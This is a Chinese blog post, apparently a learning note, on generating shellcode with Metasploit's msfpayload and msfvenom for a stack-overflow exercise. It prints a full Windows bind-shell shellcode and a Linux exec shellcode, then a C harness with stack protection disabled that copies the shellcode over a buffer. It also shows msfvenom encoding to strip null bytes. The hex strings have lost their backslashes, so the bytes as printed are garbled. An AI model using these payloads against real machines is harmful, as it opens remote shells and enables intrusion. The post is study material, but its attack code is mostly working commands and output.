• 使用metasploit进行栈溢出攻击-2


    基本的栈溢出搞明白了,真实攻击中一个很重要的问题是shellcode生成。

    利用Metasploit提供的工具,可以方便的生成shellcode,然后可以使用第一篇中的代码进行验证。

    先说一下如何生成shellcode(都是在bt5下生成)。

    例子参考来源于:http://www.offensive-security.com/metasploit-unleashed/Msfpayload

    查看可用payload:

    root@kali:~# msfpayload -l
    
    Framework Payloads (251 total)
    ==============================
    
        Name                                             Description
        ----                                             -----------
        aix/ppc/shell_bind_tcp                           Listen for a connection and spawn a command shell
        aix/ppc/shell_find_port                          Spawn a shell on an established connection
        aix/ppc/shell_interact                           Simply execve /bin/sh (for inetd programs)
        aix/ppc/shell_reverse_tcp                        Connect back to attacker and spawn a command shell
        bsd/sparc/shell_bind_tcp                         Listen for a connection and spawn a command shell
    
    ...snip...
    ...snip...
    
        windows/x64/shell/bind_tcp                       Listen for a connection (Windows x64), Spawn a piped command shell (Windows x64) (staged)
        windows/x64/shell/reverse_tcp                    Connect back to the attacker (Windows x64), Spawn a piped command shell (Windows x64) (staged)
        windows/x64/shell_bind_tcp                       Listen for a connection and spawn a command shell (Windows x64)
        windows/x64/shell_reverse_tcp                    Connect back to attacker and spawn a command shell (Windows x64)
        windows/x64/vncinject/bind_tcp                   Listen for a connection (Windows x64), Inject a VNC Dll via a reflective loader (Windows x64) (staged)
        windows/x64/vncinject/reverse_tcp                Connect back to the attacker (Windows x64), Inject a VNC Dll via a reflective loader (Windows x64) (staged)

    查看具体payload参数配置:

    root@kali:~# msfpayload windows/shell_bind_tcp o
    
           Name: Windows Command Shell, Bind TCP Inline
         Module: payload/windows/shell_bind_tcp
        Version: 14774
       Platform: Windows
           Arch: x86
    Needs Admin: No
     Total size: 341
           Rank: Normal
    
    Provided by:
      vlad902 
      sf 
    
    Basic options:
    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    EXITFUNC  process          yes       Exit technique: seh, thread, process, none
    LPORT     4444             yes       The listen port
    RHOST                      no        The target address
    
    Description:
      Listen for a connection and spawn a command shell

    最后生成shellcode,以上面例子为例,生成c语言可用shellcode:

    root@bt:~# msfpayload windows/shell_bind_tcp LPORT=7777 C
    /*
     * windows/shell_bind_tcp - 341 bytes
     * http://www.metasploit.com
     * VERBOSE=false, LPORT=7777, RHOST=, EXITFUNC=process,
     * InitialAutoRunScript=, AutoRunScript=
     */
    unsigned char buf[] =
    "xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30"
    "x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xff"
    "x31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2"
    "xf0x52x57x8bx52x10x8bx42x3cx01xd0x8bx40x78x85"
    "xc0x74x4ax01xd0x50x8bx48x18x8bx58x20x01xd3xe3"
    "x3cx49x8bx34x8bx01xd6x31xffx31xc0xacxc1xcfx0d"
    "x01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58"
    "x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8b"
    "x04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xff"
    "xe0x58x5fx5ax8bx12xebx86x5dx68x33x32x00x00x68"
    "x77x73x32x5fx54x68x4cx77x26x07xffxd5xb8x90x01"
    "x00x00x29xc4x54x50x68x29x80x6bx00xffxd5x50x50"
    "x50x50x40x50x40x50x68xeax0fxdfxe0xffxd5x89xc7"
    "x31xdbx53x68x02x00x1ex61x89xe6x6ax10x56x57x68"
    "xc2xdbx37x67xffxd5x53x57x68xb7xe9x38xffxffxd5"
    "x53x53x57x68x74xecx3bxe1xffxd5x57x89xc7x68x75"
    "x6ex4dx61xffxd5x68x63x6dx64x00x89xe3x57x57x57"
    "x31xf6x6ax12x59x56xe2xfdx66xc7x44x24x3cx01x01"
    "x8dx44x24x10xc6x00x44x54x50x56x56x56x46x56x4e"
    "x56x56x53x56x68x79xccx3fx86xffxd5x89xe0x4ex56"
    "x46xffx30x68x08x87x1dx60xffxd5xbbxf0xb5xa2x56"
    "x68xa6x95xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0x75"
    "x05xbbx47x13x72x6fx6ax00x53xffxd5";

    当然我们实在linux环境下,需要生成的linux相关shellcode,那么我们以exec payload来生成shellcode:

    root@bt:~# msfpayload  linux/x86/exec CMD=ls C
    /*
     * linux/x86/exec - 38 bytes
     * http://www.metasploit.com
     * VERBOSE=false, PrependSetresuid=false,
     * PrependSetreuid=false, PrependSetuid=false,
     * PrependChrootBreak=false, AppendExit=false, CMD=ls
     */
    unsigned char buf[] =
    "x6ax0bx58x99x52x66x68x2dx63x89xe7x68x2fx73x68"
    "x00x68x2fx62x69x6ex89xe3x52xe8x03x00x00x00x6c"
    "x73x00x57x53x89xe1xcdx80";

    好,现在我们就可以在上一节的shell.c中进行验证

     1 #include<unistd.h>
     2 
     3 unsigned char large_string[128]; 
     4 /*
     5  * linux/x86/exec - 38 bytes
     6  * http://www.metasploit.com
     7  * VERBOSE=false, PrependSetresuid=false,
     8  * PrependSetreuid=false, PrependSetuid=false,
     9  * PrependChrootBreak=false, AppendExit=false, CMD=ls
    10  */
    11 unsigned char shellcode[] =
    12 "x6ax0bx58x99x52x66x68x2dx63x89xe7x68x2fx73x68"
    13 "x00x68x2fx62x69x6ex89xe3x52xe8x03x00x00x00x6c"
    14 "x73x00x57x53x89xe1xcdx80";
    15 
    16 void main() { 
    17     char buffer[96]; 
    18     int i; 
    19     long *long_ptr = (long *) large_string; 
    20     for (i = 0; i < sizeof(large_string)/sizeof(int); i++) 
    21         *(long_ptr + i) = (int) buffer; 
    22 
    23     for (i = 0; i < sizeof(shellcode); i++) 
    24         large_string[i] = shellcode[i]; 
    25     memcpy(buffer,large_string,sizeof(large_string));
    26 } 

    请注意25行,我使用了memcpy替换了strcpy,因为生成的shellcode中有不少00.

    同样使用命令编译生成验证:

    bai@ubuntu:/mnt/hgfs/r/stack$ gcc -fno-stack-protector -z execstack -g -o shell shell.c
    bai@ubuntu:/mnt/hgfs/r/stack$ ./shell

    关于如何避免shellcode中包含00,可以使用msfvenom,还以上面的例子为例:

    root@bt:~# msfvenom  -p linux/x86/exec CMD=ls -e x86/shikata_ga_nai -b 'x00' -f c
    [*] x86/shikata_ga_nai succeeded with size 65 (iteration=1)
    unsigned char buf[] =
    "xdbxd6xd9x74x24xf4xbbxe3xa4x6bx7ex58x2bxc9xb1"
    "x0ax83xc0x04x31x58x15x03x58x15x01x51x01x75x9d"
    "x03x84xefx75x19x4ax79x62x09xa3x0ax04xcaxd3xc3"
    "xb6xa3x4dx95xd5x66x7axa6x19x87x7axc5x6ax87x2d"
    "x46x05x66x1cxe8";

    但是有个问题,生成的shellcode无法利用,会把illegal instruction,引起core dump,不明原因。

  • 相关阅读:
    学习笔记 MYSQL报错注入(count()、rand()、group by)
    学习笔记 HTTP参数污染注入
    学习笔记 MSSQL显错手工注入
    代码审计入门后审计技巧
    字符串的排列
    二叉搜索树与双向链表
    复杂链表的复制
    二叉树中和为某一值的路径
    二叉搜索树的后序遍历序列
    从上往下打印二叉树
  • 原文地址:https://www.cnblogs.com/baizx/p/4114770.html
Copyright © 2020-2023  润新知